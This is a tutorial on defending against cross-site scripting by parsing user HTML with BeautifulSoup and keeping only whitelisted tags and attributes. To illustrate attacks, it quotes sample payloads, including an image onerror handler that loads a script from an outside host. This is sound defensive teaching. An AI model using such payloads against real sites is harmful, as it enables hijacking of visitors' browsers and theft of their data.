Implementing XSS filtering in Python (BeautifulSoup and whitelist processing)

Source: Internet
Author: User
Tags html form html interpreter

The odd code formatting below is a result of exactly this kind of filtering -_-

First, what XSS is: an attacker injects malicious JavaScript into HTML, so that the script runs when the page is loaded and carries out the attack.
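To make the problem concrete, here is a minimal sketch of how user input ends up as executable markup. The function names and the comment-rendering scenario are hypothetical and not from the original post. Escaping with the standard library's html.escape is shown only for contrast: it works when the input is meant to be plain text, but a rich-text editor has to keep some HTML, which is why the rest of this article filters instead.

```python
import html

def render_comment_unsafe(comment: str) -> str:
    # Hypothetical helper: pastes user input straight into the page.
    return "<div class='comment'>" + comment + "</div>"

def render_comment_escaped(comment: str) -> str:
    # Hypothetical helper: escapes <, >, & and quotes before rendering.
    return "<div class='comment'>" + html.escape(comment) + "</div>"

payload = "<script>alert(123)</script>"

unsafe_page = render_comment_unsafe(payload)    # the script tag survives intact
escaped_page = render_comment_escaped(payload)  # the script tag becomes inert text

print(unsafe_page)
print(escaped_page)
```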

XSS is possible wherever users can submit input that is later rendered, including editors such as Blog Park's, which let you view and edit the HTML source of what you enter.

Here is Blog Park's filter. (Note the last line.)

Of course, the problem is not limited to those words. There are also event-handler attributes of the form <tag on*=... />, and the even more direct approach, <script src="JS address"></script>.

You can even use an image's error handler to load external JS dynamically.

onerror='var s=document.createElement("script"); s.src="http://xsst.sinaapp.com/m.js"; (document.body||document.documentElement).appendChild(s);' />

Looking back at these techniques, a few tags and attributes stand out:

The <script> tag, the src attribute, and on* event-handler attributes.
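As a rough illustration of those three features, the sketch below uses the standard library's html.parser to report them in a piece of markup. The class and function names are hypothetical. It is only a detector meant to show what to look for, not a filter.

```python
from html.parser import HTMLParser

class SuspiciousFeatureFinder(HTMLParser):
    """Hypothetical helper: records script tags, src attributes and on* attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling this.
        if tag == "script":
            self.findings.append(("tag", tag))
        for name, _value in attrs:
            if name == "src" or name.startswith("on"):
                self.findings.append(("attribute", f"{tag}[{name}]"))

def find_suspicious(markup):
    finder = SuspiciousFeatureFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings

print(find_suspicious('<img src="x" onerror="alert(1)" />'))
print(find_suspicious('<script src="JS address"></script>'))
print(find_suspicious("<p class='c1'>hi</p>"))
```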

So we can allow only a small set of tags through. (A blacklist is not safe: there is always an attack you did not think of that someone else will.)
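The weakness of a blacklist can be shown with a deliberately naive example. The naive_blacklist function below is a hypothetical strawman, not something from the original post. It strips the literal script tags in a single pass, and both a nested payload and an event-handler payload get past it.

```python
def naive_blacklist(markup: str) -> str:
    # Hypothetical strawman: remove the literal opening and closing script tags once.
    return markup.replace("<script>", "").replace("</script>", "")

# Removing the inner tags reassembles a working script tag from the outer pieces.
nested_payload = "<scr<script>ipt>alert(123)</scr</script>ipt>"
nested_result = naive_blacklist(nested_payload)

# No script tag at all, so the blacklist has nothing to remove.
event_payload = "<img src=x onerror=alert(1)>"
event_result = naive_blacklist(event_payload)

print(nested_result)
print(event_result)
```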

Now for the filtering itself. Regular expressions are probably the first thing that comes to mind, but a correct pattern is hard to design. Instead, we first parse the HTML with BeautifulSoup and then filter out the sensitive tags and attributes.
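A small sketch of why the regular-expression route is hard: the pattern below is a hypothetical first attempt, and three trivial spelling variants of the same tag slip through it. Patching each variant in turn is possible, but the pattern grows quickly and still says nothing about on* attributes.

```python
import re

# Hypothetical first attempt at a script-stripping pattern.
SCRIPT_RE = re.compile(r"<script>.*?</script>")

variants = [
    "<script>alert(1)</script>",           # the only form the pattern expects
    "<SCRIPT>alert(1)</SCRIPT>",           # different case
    "<script >alert(1)</script >",         # whitespace inside the tag
    '<script src="JS address"></script>',  # tag carrying an attribute
]

# A variant "survives" if anything is left after the substitution.
survivors = [v for v in variants if SCRIPT_RE.sub("", v) != ""]

for v in survivors:
    print("not removed:", v)
```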

from bs4 import BeautifulSoup

content = """<p class='c1' id='i1'>asdfaa<span style="font-family:NSimSun;">sdf<a>a</a>sdf</span>sdf</p><p><strong class='c2' id='i2'>asdf</strong><script>alert(123)</script></p>"""

# Whitelist: the safe tags, each with the attributes it is allowed to keep.
tags = {
    'p': ['class'],
    'strong': ['id'],
}

# 'html.parser' selects Python's built-in HTML parser.
soup = BeautifulSoup(content, 'html.parser')

for tag in soup.find_all():
    if tag.name not in tags:
        tag.hidden = True  # do not render the tag itself
        tag.clear()        # delete the contents of the tag
        continue

    # All attributes submitted by the user, as a dictionary,
    # e.g. {'class': ['c1'], 'id': 'i1'} (BeautifulSoup stores class as a list).
    input_attrs = tag.attrs
    # Attributes allowed for this tag, e.g. ['class'].
    valid_attrs = tags[tag.name]

    # Iterate over a copy of the keys (list(...)): deleting entries from a
    # dictionary while iterating over it directly raises a RuntimeError.
    for k in list(input_attrs.keys()):
        if k not in valid_attrs:
            del tag.attrs[k]  # delete the disallowed attribute

# decode() serializes the tree back to an HTML string.
content = soup.decode()
print(content)
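The same steps can be wrapped in a reusable function. This is a sketch under the same assumptions as the code above (bs4 installed, the hidden-and-clear approach kept as is). The names filter_html and DEFAULT_WHITELIST are hypothetical and chosen only for this example.

```python
from bs4 import BeautifulSoup

# Hypothetical default: the same whitelist as in the article's example.
DEFAULT_WHITELIST = {"p": ["class"], "strong": ["id"]}

def filter_html(markup, whitelist=None):
    """Drop tags and attributes that are not in the whitelist."""
    if whitelist is None:
        whitelist = DEFAULT_WHITELIST
    soup = BeautifulSoup(markup, "html.parser")
    for tag in soup.find_all():
        if tag.name not in whitelist:
            tag.hidden = True  # do not render the tag itself
            tag.clear()        # drop everything inside it
            continue
        allowed = whitelist[tag.name]
        # Copy the attribute names first so deletion is safe during the loop.
        for name in list(tag.attrs):
            if name not in allowed:
                del tag.attrs[name]
    return soup.decode()

dirty = '<p class="c1" onclick="alert(1)">hi</p><img src="x" onerror="alert(1)" />'
cleaned = filter_html(dirty)
print(cleaned)
```

Note that this approach also discards any text inside a disallowed tag, which matches the behaviour of the original loop.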
